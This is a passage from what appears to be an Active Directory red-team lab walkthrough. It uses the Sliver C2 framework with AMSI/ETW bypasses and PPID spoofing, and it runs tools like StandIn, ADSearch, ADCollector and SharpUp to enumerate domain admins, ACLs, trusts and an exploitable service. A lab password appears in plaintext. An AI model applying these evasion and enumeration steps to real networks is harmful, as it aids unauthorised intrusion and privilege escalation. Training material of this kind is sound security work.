the same command execution with the mentioned bypasses is as follows.
Note: AMSI/ETW bypasses using execute-assembly in Sliver can only be performed in the current process
(Self-Injection) and not in a remote process. Use the -i flag to perform execution within the current Sliver
beacon process. To perform an AMSI/ETW bypass in a remote process use the inject-amsi-bypass and
inject-etw-bypass commands.
[server] sliver (dcorp-std_https) > execute-assembly -i -M -E -t 80 '/mnt/c/A
D/Tools/StandIn.exe' '--ldap samaccountname=* --filter displayname'
[*] Output:

[..................snip...................]
[?] Object : CN=Backup Operators

Path : LDAP://CN=Backup Operators,CN=Builtin,DC=dollarcorp,DC=moneyco
rp,DC=local
[?] Object : CN=Cert Publishers
Path : LDAP://CN=Cert Publishers,CN=Users,DC=dollarcorp,DC=moneycorp,
DC=local
[?] Object : CN=Certificate Service DCOM Access
Path : LDAP://CN=Certificate Service DCOM Access,CN=Builtin,DC=dollar
corp,DC=moneycorp,DC=local
[?] Object : CN=ci admin
Path : LDAP://CN=ci admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=loca
l
[+] displayname
|_ ci admin
[..................snip...................]
execute-assembly:
-i, --in-process Run in the current sliver process
-M, --amsi-bypass Bypass AMSI on Windows
-E, --etw-bypass Bypass ETW on Windows
Execution using inline-execute-assembly which avoids the Fork and Run execution technique is as
follows.
[server] sliver (dcorp-std_https) > inline-execute-assembly -t 180 '/mnt/c/AD
/Tools/StandIn.exe' '--ldap "(&(objectCategory=person)(objectClass=user))" --
limit 100'
[*] Output:


=local
[+] logoncount
|_ 65535
[+] codepage
|_ 0

[+] objectcategory
|_ CN=Person,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
[+] description
[+] usnchanged
|_ 3404228
[+] instancetype
|_ 4
[+] name
|_ Administrator
[+] badpasswordtime
|_ 9/15/2022 10:57:35 AM UTC
[+] pwdlastset
|_ 2/17/2019 5:14:11 AM UTC
[+] objectclass
|_ top
|_ person
|_ organizationalPerson
|_ user
[+] badpwdcount
|_ 0
[+] samaccounttype
|_ SAM_NORMAL_USER_ACCOUNT
[..................snip...................]
It is advised to use execute-assembly for fork and run execution for larger .NET binaries to avoid
crashing our own Sliver implant/beacon process via Self-Injection methods. Hence for most of the tool
execution during the lab we focus on using execute-assembly with valid PPID spoofing.
To query LDAP over a single/specific object using StandIn we can use the --object argument. In this
example we query a single object which is the dcorp\administrator object using its known
samaccountname property to retrieve only it’s description and the lastlogon properties using the --filter
argument.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--object samaccou
ntname=administrator --filter lastlogon,description'
[*] Output:

=local
[?] Iterating object properties

|_ Applying property filter => lastlogon,description
[+] description
[+] lastlogon
|_ 9/16/2022 11:25:00 AM UTC
This also works the same with --ldap argument only difference being that the --ldap argument can be
used to perform LDAP queries over multiple objects at a time while the --object argument allows to
perform LDAP queries only over a single object.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap samaccount
name=administrator --filter lastlogon,description'
[*] Output:

=local

|_ Applying property filter => lastlogon,description
[+] description
[+] lastlogon
|_ 9/16/2022 11:25:00 AM UTC

Analysis using Process Hacker
Analyzing the execution using Process Hacker on dcorp-stdX we see that all execute-assembly tasks are
injected via Fork and Run into taskhostw spawned under the Svchost process with a PID: 2396.

Using ADSearch
We can enumerate users using the --users argument in ADSearch.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--users'
[*] Output:
___ ____ _____ __
/ | / __ \/ ___/___ ____ ______/ /_
/ /| | / / / /\__ \/ _ \/ __ `/ ___/ __ \
/ ___ |/ /_/ /___/ / __/ /_/ / /__/ / / /
/_/ |_/_____//____/\___/\__,_/\___/_/ /_/
Twitter: @tomcarver_
GitHub: @tomcarver16
[*] No domain supplied. This PCs domain will be used instead

[*] LDAP://DC=dollarcorp,DC=moneycorp,DC=local
[*] ALL USERS:
[*] TOTAL NUMBER OF USERS: 97
[+] cn : Administrator
[+] cn : Guest
[+] cn : DefaultAccount
[+] cn : krbtgt
[+] cn : mcorp$
[+] cn : us$
[+] cn : ci admin
[+] cn : sql admin
[+] cn : web svc
[+] cn : srv admin
[+] cn : app admin
[+] cn : mgmt admin
[+] cn : svc admin
[.........snip..........]
ADSearch:
--users Enumerate and return all users from AD.
It is also possible to do this with a LDAP query using the --search argument and the
(&(objectCategory=person)(objectClass=user)) query as shown above using StandIn (By default selects
the cn attribute).
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(&(obj
ectCategory=person)(objectClass=user))"'
[*] Output:

[*] CUSTOM SEARCH:
[*] TOTAL NUMBER OF SEARCH RESULTS: 94
[+] cn : Guest
[+] cn : DefaultAccount
[+] cn : krbtgt
[+] cn : ci admin
[+] cn : sql admin
[+] cn : web svc
[+] cn : srv admin
[+] cn : app admin
[+] cn : mgmt admin
[+] cn : svc admin
ADSearch:
--search Perform a custom search on the AD server.
--attributes Attributes to be returned from the results in csv.
[..................snip...................]
We can query the dcorp\administrator object using a known property like the samaccountname and the
LDAP filter: (samaccountname=administrator). We can optionally return specific properties of the
object using the --attributes argument. In this case we filter to retrieve only the cn, description and the
logoncount properties.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(samac
countname=administrator)" --attributes cn,logoncount,description'
[*] Output:

[*] CUSTOM SEARCH:
[+] logoncount : 65535
[+] description : Built-in account for administering the computer/domain

Enumerating Computers
Using StandIn
We can enumerate computer objects using StandIn with the LDAP query: (objectCategory=computer).
This LDAP query filters for objects with a matching Object Category property as computer which in short
looks for all COMPUTER OBJECT types. We also use a filter to return only the SamAccountName property
using the --filter argument.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(objectCa
tegory=computer)" --filter samaccountname'
[*] Output:


|_ Applying property filter => samaccountname
[?] Object : CN=DCORP-DC

Path : LDAP://CN=DCORP-DC,OU=Domain Controllers,DC=dollarcorp,DC=mone
ycorp,DC=local
[+] samaccountname
|_ DCORP-DC$
[?] Object : CN=DCORP-MGMT
Path : LDAP://CN=DCORP-MGMT,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=
local
[+] samaccountname
|_ DCORP-MGMT$
[?] Object : CN=DCORP-CI
Path : LDAP://CN=DCORP-CI,OU=Servers,DC=dollarcorp,DC=moneycorp,DC=lo
cal
[+] samaccountname
|_ DCORP-CI$
[.................snip..................]

Using ADSearch
We enumerate computer objects using the in-built --computers argument using ADSearch. It is possible
to use raw LDAP queries to perform the same.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--computers'
[*] Output:

[*] ALL COMPUTERS:
[*] TOTAL NUMBER OF COMPUTERS: 28
[+] cn : DCORP-DC
[+] cn : DCORP-MGMT
[+] cn : DCORP-CI
[+] cn : DCORP-MSSQL
[+] cn : DCORP-ADMINSRV
[+] cn : DCORP-APPSRV
[+] cn : DCORP-SQL1
[+] cn : DCORP-STDADM
[+] cn : DCORP-STDX
[............snip...........]

Enumerating Domain Administrators
Using StandIn
Enumerate members of the domain admins group using StandIn by querying the domain admins object
using a known property like its samaccountname/distinguishedname such as:
(samaccountname=domain admins) and use a filter to return the member property of the object using
the --filter argument to list all members of the group.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--object "(samacc
ountname=domain admins)" --filter member'
[*] Output:

[?] Object : CN=Domain Admins
Path : LDAP://CN=Domain Admins,CN=Users,DC=dollarcorp,DC=moneycorp,DC
=local

|_ Applying property filter => member
[+] member
|_ CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
|_ CN=Administrator,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
An alternative would be to query a group for its members using the --group argument as follows.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--group "domain a
dmins"'
[*] Output:
[…snip…]
[+] Members
[?] Path : LDAP://CN=Administrator,CN=Users,DC=dollarcorp,DC=moneyc

orp,DC=local
samAccountName : Administrator
Type : SAM_USER_OBJECT
SID : S-1-5-21-719815819-3726368948-3917688648-500
[?] Path : LDAP://CN=svc admin,CN=Users,DC=dollarcorp,DC=moneycorp,
DC=local
samAccountName : svcadmin
SID : S-1-5-21-719815819-3726368948-3917688648-1118

Using ADSearch
We can enumerate members of the domain admins group using the --domain-admins argument using
ADSearch.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--domain-admins'
[*] Output:

[*] ALL DOMAIN ADMINS:
[*] TOTAL NUMBER OF DOMAIN ADMINS: 2
[+] cn : svc admin
To filter specific properties of the above users, use LDAP queries using the --search command and use
appropriate filters using the --attributes argument to return specific properties.

Enumerating Enterprise Administrators
Using StandIn
Enumerate members of the Enterprise admins group using StandIn by querying the group for its
members using the --group argument. Since we can enumerate the moneycorp forest domain
(BiDirectional Trust), we need to specify the domain using the --domain argument and supply
credentials using the --user/--pass arguments to avoid the Kerberos Double Hop issue. In this case we
supply our foothold user credentials for studentX.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--group "enterpri
se admins" --domain moneycorp.local --user "studentX" --pass "JPIzbuWHdSfq9NF
r"'
[*] Output:
[?] Using DC : mcorp-dc.moneycorp.local

[?] Type : Group resolution
Group : Enterprise Admins
[+] Members
[?] Path : LDAP://moneycorp.local/CN=Administrator,CN=Users,DC=mone

ycorp,DC=local
samAccountName : Administrator
SID : S-1-5-21-335606122-960912869-3279953914-500
StandIn:
--domain Domain name
--user User name
--pass Password
--group Target group

Using ADSearch
Enumerate members of the Enterprise Admins group using ADSearch by using the LDAP filter:
(&(objectCategory=group)(cn=enterprise admins)). This LDAP query filters for objects with a matching
Object Category property as group and a specific cn property as enterprise admins. We filter for the cn,
member properties of the object using the --attributes filter option.
ectCategory=group)(cn=enterprise admins))" --attributes cn,member --domain mo
neycorp.local'
[*] Output:
[*] LDAP://DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
[+] cn : Enterprise Admins
[+] member : CN=Administrator,CN=Users,DC=moneycorp,DC=local
ADSearch:
--domain The domain controller we are connecting to in the FQDN f
ormat
--username Attempts to authenticate to AD with the given username.
--password Attempts to authenticate to AD with the given password.

• List all the OUs
• List all the computers in the StudentMachines OU
• List the GPOs
• Enumerate GPO applied on the StudentMachines OU
List all the OUs

Using StandIn
We can enumerate all OU’s with StandIn using the LDAP query: (objectCategory=organizationalUnit).
This LDAP query filters for objects with a matching Object Category property as organizationalUnit. We
can filter the results using the --filter argument to only return the name property as follows.
tegory=organizationalUnit)" --filter name'
[*] Output:

|_ Applying property filter => name
[?] Object : OU=Domain Controllers

Path : LDAP://OU=Domain Controllers,DC=dollarcorp,DC=moneycorp,DC=loc
al
[+] name
|_ Domain Controllers
[?] Object : OU=Applocked

Path : LDAP://OU=Applocked,DC=dollarcorp,DC=moneycorp,DC=local
[+] name
|_ Applocked
[?] Object : OU=Servers

Path : LDAP://OU=Servers,DC=dollarcorp,DC=moneycorp,DC=local
[+] name
|_ Servers

[?] Object : OU=StudentMachines
Path : LDAP://OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local
[+] name
|_ StudentMachines

Using ADSearch
We can enumerate all OU’s with ADSearch using the same LDAP query:
(objectCategory=organizationalUnit). We can filter the results by only returning the name property
using the --attributes argument.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(objec
tCategory=organizationalUnit)" --attributes name'
[*] Output:

[*] CUSTOM SEARCH:
[+] name : Domain Controllers
[+] name : Applocked
[+] name : Servers
[+] name : StudentMachines

Enumerate DistinguishedName for StudentMachines OU
Using StandIn
Using StandIn get the distinguished name of the StudentMachines OU using the LDAP query:
(OU=StudentMachines) or (&(objectCategory=organizationalUnit)(|(name=StudentMachines))). Use
the --filter argument to return only the distinguishedname property of the queried object.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(OU=Stude
ntMachines)" --filter distinguishedname'
[*] Output:


|_ Applying property filter => distinguishedname

[+] distinguishedname
|_ OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=local

Using ADSearch
Using ADSearch get the distinguished name of the StudentMachines OU using the LDAP query:
(OU=StudentMachines). Use the --attributes argument to retrieve only the distinguishedname property.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(OU=St
udentMachines)" --attributes distinguishedname'
[*] Output:

[*] CUSTOM SEARCH:
[+] distinguishedname : OU=StudentMachines,DC=dollarcorp,DC=moneycorp,DC=l
ocal

List all the computers in the StudentMachines OU
Using DSQuery
Since ADSearch and StandIn don’t allow querying custom Search Bases over a distinguishedname we can
use the C# version of dsquery to do so.
Find the source for dsquery.cs from here. Dsquery can also be used to perform all standard
enumeration that StandIn and ADSearch perform using LDAP queries.
Use dsquery to perform a custom search over the StudentMachines OU by supplying it’s
distinguisedname as a Search Base/Start Node and use the -filter argument to perform a LDAP query to
query all computers in the StudentMachines OU.
Note: here -filter performs a LDAP query.

ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/dsquery.exe' '* "OU=StudentMach
ines,DC=dollarcorp,DC=moneycorp,DC=local" -filter "(objectCategory=computer)"
'
[*] Output:
Records Found: 1
accountexpires: 9223372036854775807
adspath: LDAP://CN=DCORP-STDADM,OU=StudentMachines,DC=dollarcorp,DC=moneycorp
,DC=local
badpasswordtime: 132426575463687563
badpwdcount: 0
cn: DCORP-STDADM
codepage: 0
countrycode: 0
distinguishedname: CN=DCORP-STDADM,OU=StudentMachines,DC=dollarcorp,DC=moneyc
orp,DC=local
dnshostname: dcorp-stdadm.dollarcorp.moneycorp.local
dscorepropagationdata: 5/3/2020 9:04:05 AM
instancetype: 4
iscriticalsystemobject: False
lastlogoff: 0
lastlogon: 133080561744848387
lastlogontimestamp: 133080301217800681
localpolicyflags: 0
logoncount: 267
msds-supportedencryptiontypes: 28
name: DCORP-STDADM
objectcategory: CN=Computer,CN=Schema,CN=Configuration,DC=moneycorp,DC=local
objectclass: top

objectclass: person
objectclass: organizationalPerson
objectclass: user
objectclass: computer
objectguid: {D2FD66CD-C854-4745-BA5C-0FA2D6298A56}
objectsid: S-1-5-21-1874506631-3219952063-538504511-2149
operatingsystem: Windows Server 2016 Standard
operatingsystemversion: 10.0 (14393)
primarygroupid: 515
pwdlastset: 132773719811689017
samaccountname: DCORP-STDADM$
samaccounttype: 805306369
serviceprincipalname: WSMAN/dcorp-stdadm
serviceprincipalname: WSMAN/dcorp-stdadm.dollarcorp.moneycorp.local
serviceprincipalname: TERMSRV/DCORP-STDADM
serviceprincipalname: TERMSRV/dcorp-stdadm.dollarcorp.moneycorp.local
serviceprincipalname: RestrictedKrbHost/DCORP-STDADM
serviceprincipalname: HOST/DCORP-STDADM
serviceprincipalname: RestrictedKrbHost/dcorp-stdadm.dollarcorp.moneycorp.loc
al
serviceprincipalname: HOST/dcorp-stdadm.dollarcorp.moneycorp.local
useraccountcontrol: 4096
usnchanged: 3404189
usncreated: 117829
whenchanged: 9/19/2022 3:02:01 AM
whencreated: 2/26/2019 8:37:54 AM
DONE

List the GPOs
Using StandIn
For the next task, we can use the --gpo option to list all GPOs using StandIn or as an alternative use the
LDAP query: (objectCategory=groupPolicyContainer). Use the --filter argument to only select the
displayname property.
tegory=groupPolicyContainer)" --filter displayname'
[*] Output:


|_ Applying property filter => displayname
[?] Object : CN={31B2F340-016D-11D2-945F-00C04FB984F9}

Path : LDAP://CN={31B2F340-016D-11D2-945F-00C04FB984F9},CN=Policies,C
N=System,DC=dollar corp,DC=moneycorp,DC=local
[+] displayname
|_ Default Domain Policy
[?] Object : CN={6AC1786C-016F-11D2-945F-00C04fB984F9}

Path : LDAP://CN={6AC1786C-016F-11D2-945F-00C04fB984F9},CN=Policies,C
[+] displayname
|_ Default Domain Controllers Policy
[?] Object : CN={211A25B2-03AD-4E5E-9C6A-AFEFE66EFB2D}

Path : LDAP://CN={211A25B2-03AD-4E5E-9C6A-AFEFE66EFB2D},CN=Policies,C
[+] displayname
|_ Applocker
[..................snip................]

Using ADSearch
We can use ADSearch to list all GPOs with the LDAP query: (objectCategory=groupPolicyContainer). Use
the --attributes argument to only select the displayname property.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(objec
tCategory=groupPolicyContainer)" --attributes displayname'
[*] Output:

[*] CUSTOM SEARCH:
[+] displayname : Default Domain Policy
[+] displayname : Default Domain Controllers Policy
[+] displayname : Applocker
[+] displayname : Servers
[+] displayname : Students

Enumerate GPOs applied on the StudentMachines OU
Using StandIn
For the next task, to enumerate GPOs applied on the StudentMachines OU, we need to first copy a part
of the gplink attribute. We can do this with StandIn using the filter: (OU=StudentMachines) and then
filter for the gplink property of the object using the --filter argument as follows.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(OU=Stude
ntMachines)" --filter gplink'
[*] Output:

|_ Applying property filter => gplink

[+] gplink
|_ [LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=policies, cn=syst
em,DC=dollarcorp,DC=moneycorp,DC=local;0]
Now, copy the GPLink string from above (no square brackets, no semicolon and nothing after semicolon)
and use it below with StandIn to figure out which GPO corresponds to that GPLink attribute by using the
LDAP query: (&(objectCategory=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-
9E4618BC785D}))). Use the --filter argument to get only the name of the GPO applied via the
displayname property as follows.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/StandIn.exe' '--ldap "(&(object
Category=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-9E4618BC785D})
))" --filter displayname'
[*] Output:
|_ Applying property filter => displayname
[?] Object : CN={7478F170-6A0C-490C-B355-9E4618BC785D}

Path : LDAP://CN={7478F170-6A0C-490C-B355-9E4618BC785D},CN=Policies,
CN=System,DC=dollarcorp,DC=moneycorp,DC=local
[+] displayname
|_ Students

Using ADSearch
To enumerate GPOs applied on the StudentMachines OU, we need to first copy a part of the gplink
attribute. We can do this with ADSearch using the filter: (OU=StudentMachines) and then filter for the
gplink attribute using the --attributes argument as follows.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '--search "(OU=St
udentMachines)" --attributes gplink'
[*] Output:

[*] CUSTOM SEARCH:
[+] gplink : [LDAP://cn={7478F170-6A0C-490C-B355-9E4618BC785D},cn=pol
icies, cn=system,DC=dollarcorp,DC=moneycorp,DC=local;0]
Now, copy the GPLink string from above (no square brackets, no semicolon and nothing after semicolon)
and use it below with ADSearch to figure out which GPO corresponds to that GPLink attribute by using
the LDAP query: (&(objectCategory=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-
9E4618BC785D}))). Use the --attributes argument to get only the name of the GPO applied via the
displayname property as follows.
ectCategory=groupPolicyContainer)(|(name={7478F170-6A0C-490C-B355-9E4618BC785
D})))" --attributes displayname'
[*] Output:

[*] CUSTOM SEARCH:
[+] displayname : Students

• ACL for the Domain Admins group
• All modify rights/permissions for the studentX
ACL for the Domain Admins group

Using ADCollector
Enumerating ACls using LDAP queries is a bit cumbersome because these permissions are held in the
nTSecurityDescriptor attribute. This is a binary attribute, which requires further interpretation,
possibly with a programming language rather than a shell. Since ADSearch and StandIn do not support
competent ACL enumeration over an object and its groups we can use ADCollector which does this with
organized and structured output extracting useful properties/ACLs efficiently.
Let’s enumerate the DACL for the Domain Admins Group using ADCollector. Specify the DACL to
enumerate using the --DACL argument and specify the Distinguished Name of the Domain Admins
group.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADCollector.exe' '--DACL "CN=DO
MAIN ADMINS,CN=USERS,DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL"'
[*] Output:
_ ____ ____ _ _ _
/ \ | _ \ / ___|___ | | | ___ ___ _| |_ ___ _ __
/ _ \ | | | | | / _ \| | |/ _ \/ __|_ __/ _ \| __|
/ ___ \| |_| | |__| (_) | | | __/ (__ | || (_) | |
/_/ \_\____/ \____\___/|_|_|\___|\___| |__/\___/|_|
v3.0.1 by dev2null
[-] DACL on CN=DOMAIN ADMINS,CN=USERS,DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL:
- CN=DOMAIN ADMINS,CN=USERS,DC=DOLLARCORP,DC=MONEYCORP,DC=LOCAL
Authenticated Users All properties (GenericRead
[Allow])
Local System All properties (GenericAll
[Allow])
BUILTIN\Administrators CreateChild, DeleteChild, S
elf, WriteProperty, [ExtendedRight: All [Allow]], Delete, GenericRead, WriteD
acl, WriteOwner
mcorp\Enterprise Admins CreateChild, DeleteChild, S
elf, WriteProperty, [ExtendedRight: All [Allow]], GenericRead, WriteDacl, Wri
teOwner
dcorp\Domain Admins CreateChild, DeleteChild, S

elf, WriteProperty, [ExtendedRight: All [Allow]], GenericRead, WriteDacl, Wri
teOwner, Owner
[.....snip.....]
Server (ReadProperty, WriteProperty [Allow])

dcorp\Cert Publishers X509-Cert (ReadProperty, Wr
iteProperty [Allow])
[*] Done!
ADCollector:
--DACL Enumerate DACL on the target object (use Distinguishe
dName)

All modify rights/permissions for studentX
Using ADCollector
To check for modify rights or equivalent permissions that dcorp\studentX has over other objects, we can
use ADCollector using the --ACLScan argument followed by the identity to enumerate.
Note: ADCollector automatically even queries interesting DACLs for the groups the user is part of
(dcorp\studentX is a member of the RDPUsers group)).

ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADCollector.exe' '--ACLScan "st
udentX"'
[*] Output
[-] Interesting ACL for studentX:
- DC=dollarcorp,DC=moneycorp,DC=local
Authenticated Users Enable-Per-User-Reversibly-Encrypte

d-Password
Update-Password-Not-Required-Bit
Unexpire-Password
- CN=ControlXUser,CN=Users,DC=dollarcorp,DC=moneycorp,DC=local
dc
orp\RDPUsers All properties (GenericAll)
-
[...............snip.................]
[*] Done!

• Enumerate all domains in the moneycorp.local forest.
• Map the trusts of the dollarcorp.moneycorp.local domain.
• Map External trusts in moneycorp.local forest.
• Identify external trusts of dollarcorp domain.
• Can you enumerate trusts for a trusting forest?
Enumerate all domains in the moneycorp.local forest

Using DSQuery
Let’s enumerate all domains in the moneycorp forest using DSQuery. To do so we need to perform the
follows.
• A LDAP Search with a Search Base of: CN=Partitions,CN=Configuration,DC=moneycorp,DC=com
• A LDAP Filter: (nETBIOSName=*)
• Filter to return the Attribute: nCNames
Since we are using a custom search base, we use DSQuery since StandIn and ADSearch do not support
custom search bases.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/dsquery.exe' '* "CN=Partitions,
CN=Configuration,DC=moneycorp,DC=local" -filter "(nETBIOSName=*)" -attr ncnam
e'
[*] Output:
Records Found: 3
ncname
DC=dollarcorp,DC=moneycorp,DC=local
DC=moneycorp,DC=local
DC=us,DC=dollarcorp,DC=moneycorp,DC=local
DONE

Map the trusts of the dollarcorp.moneycorp.local domain
Using ADSearch
We can use ADSearch/StandIn with raw LDAP queries to enumerate domain trusts:
(objectClass=trustedDomain). This LDAP query filters for objects with a matching Object Class property
as trustedDomain which in short returns all trusted domains and their respective properties. Filter only
the trust properties of the object using the --attributes argument. We can use StandIn/ADSearch to
perform this. In this case we use ADSearch.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d dollarcorp.mo
neycorp.local --search "(objectClass=trustedDomain)" --attributes cn,flatName
,name,objectClass,trustAttributes,trustDirection,trustPartner --json'
[*] Output:
[*] CUSTOM SEARCH:
[
{
"cn": "moneycorp.local
"flatName": "mcorp
"name": "moneycorp.local
"objectClass":
"top
"leaf",
"trustedDomain
],
"trustAttributes": 32
"trustDirection": 3,
"trustPartner": "moneycorp.local"
},
{
"cn": "us.dollarcorp.moneycorp.local",
"flatName": "us",
"name": "us.dollarcorp.moneycorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustAttributes": 32,
"trustPartner": "us.dollarcorp.moneycorp.local"
},

{
"cn": "eurocorp.local",
"flatName": "ecorp",
"name": "eurocorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustPartner": "eurocorp.local"
}
]
To understand the trust properties (trustAttributes & trustDirection), we can look up the corresponding
attribute numbers in the Microsoft Documentation listed here.
• trustAttributes: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
adts/e9a2d23c-c31e-4a6f-88a0-6646fdb51a3c
• trustDirection: https://docs.microsoft.com/en-us/openspecs/windows_protocols/ms-
adts/5026a939-44ba-47b2-99cf-386a9e674b04
For example, if the trustDirection = 3, from the above Microsoft Documentation it states that if the
trustDirection = 0x00000003 it is a BiDirectional Trust.
Map External trusts in moneycorp.local forest

Using ADSearch
From the above listed Microsoft Documentation, we can enumerate for an external trust by searching
trusts with SID filtering enabled (Mostly seen in cross forest trusts). That is when trustAttributes =
0x00000004.
We can use this as a LDAP query: (trustAttributes=4) to filter out External Trusts using ADSearch for the
moneycorp.local domain as follows.

ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d moneycorp.loc
al --search "(trustAttributes=4)" --attributes cn,flatName,name,objectClass,t
rustAttributes,trustDirection,trustPartner --json'
[*] Output:
[*] LDAP://DC=moneycorp,DC=local
[*] CUSTOM SEARCH:
There are no external cross forest trusts specified for the moneycorp.local domain.

Identify external trusts of dollarcorp domain
Using ADSearch
We can use the same LDAP query to filter out External Trusts using ADSearch for the
dollarcorp.moneycorp.local domain using ADSearch as follows.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d dollarcorp.mo
neycorp.local --search "(trustAttributes=4)" --attributes cn,flatName,name,ob
jectClass,trustAttributes,trustDirection,trustPartner --json'
[*] Output:
[*] CUSTOM SEARCH:
[
{
"cn": "eurocorp.local",
"flatName": "ecorp",
"name": "eurocorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustPartner": "eurocorp.local"
}
]

Enumerate Trusts of a trusting forest
Using ADSearch
Since the above dollarcorp trust to eurocorp is a Bi-Directional cross forest external trust, we can extract
information from the eurocorp forest the same way as we did above using the
(objectClass=trustedDomain) LDAP query to enumerate forest trusts using ADSearch.
ystem32\taskhostw.exe' -t 80 '/mnt/c/AD/Tools/ADSearch.exe' '-d eurocorp.loca
l --search "(objectClass=trustedDomain)" --attributes cn,flatName,name,object
Class,trustAttributes,trustDirection,trustPartner --json'
[*] Output:
[*] LDAP://DC=eurocorp,DC=local
[*] CUSTOM SEARCH:
[
{
"cn": "eu.eurocorp.local",
"flatName": "eu",
"name": "eu.eurocorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustPartner": "eu.eurocorp.local"
},
{
"cn": "dollarcorp.moneycorp.local",
"flatName": "dcorp",
"name": "dollarcorp.moneycorp.local",
"objectClass": [
"top",
"leaf",
"trustedDomain"
],
"trustPartner": "dollarcorp.moneycorp.local"
}
]

• Exploit a service on dcorp-studentX and elevate privileges to local administrator.
• Identify a machine in the domain where studentX has local administrative access.
• Using privileges of a user on Jenkins on 172.16.3.11:8080, get admin privileges on 172.16.3.11 - the
dcorp-ci server.
Enumerating the vulnerable service

Using SharpUp
SharpUp is a C# port of PowerUp, we will leverage it to find privilege escalation checks using the audit
argument.
ystem32\taskhostw.exe' -t 180 /mnt/c/AD/Tools/Sharpup.exe audit
[*] sharpup output:
=== SharpUp: Running Privilege Escalation Checks ===
[*] In medium integrity but user is a local administrator- UAC can be bypasse
d.
[*] Audit mode: running an additional 15 check(s).

[!] Modifiable scheduled tasks were not evaluated due to permissions.
=== Modifiable Folders in %PATH% ===

C:\Python27\
=== Services with Unquoted Paths ===

Service 'AbyssWebServer' (StartMode: Automatic) has executable 'C:\We
bServer\Abyss Web Server\WebServer\abyssws.exe --service', but 'C:\WebServer\
Abyss' is modifable.
Service 'AbyssWebServer' (StartMode: Automatic) has executable 'C:\W

ebServer\Abyss Web Server\WebServer\abyssws.exe --service', but 'C:\WebServer
\Abyss Web' is modifable.
=== Modifiable Service Binaries ===

Service 'AbyssWebServer' (State: Running, StartMode: Auto) : C:\WebSe
rver\Abyss Web Server\WebServer\abyssws.exe --service
=== Modifiable Services ===

Service 'AbyssWebServer' (State: Running, StartMode: Auto)
Service 'SNMPTRAP' (State: Running, StartMode: Auto)

There 3 ways to abuse the AbyssWebServer service as shown from above.
1. Unquoted Service Paths
2. Modifiable Service Binaries
3. Modifiable Services

Using Seatbelt and Stracciatella
Seatbelt performs host safety-checks for offensive and defensive purposes, we will leverage it to find
privilege escalation avenues. We enumerate only system checks using the -group=system argument.

ystem32\taskhostw.exe' -t 180 /mnt/c/AD/Tools/Seatbelt.exe -group=System
[*] seatbelt output:
====== AMSIProviders ======

GUID : {2781761E-28E0-4109-99FE-B9D127C57AFE}
ProviderPath : "C:\ProgramData\Microsoft\Windows Defender
\Platform\4.18.2108.7-0\MpOav.dll"
====== AntiVirus ======
Cannot enumerate antivirus. root\SecurityCenter2 WMI namespace is not availab
le on Windows Servers
====== AppLocker ======
[...........snip...........]
====== Services ======

Non Microsoft Services (via WMI)
Name : AbyssWebServer
DisplayName : Abyss Web Server
Description :
User : LocalSystem
State : Stopped
StartMode : Auto
Type : Own Process
ServiceCommand : C:\WebServer\Abyss Web Server\abyssws.exe
-service
BinaryPath : C:\WebServer\Abyss Web Server\abyssws.exe
BinaryPathSDDL : O:BAD:AI(A;ID;FA;;;WD)(A;ID;FA;;;SY)(A;ID;
FA;;;BA)(A;ID;0x1200a9;;;BU)
[...........snip...........]
We can use now Stracciatella to further execute icacls to enumerate modifiable service binary
permissions for the abyssws.exe binary. Stracciatella is a PowerShell runspace from within C# (also
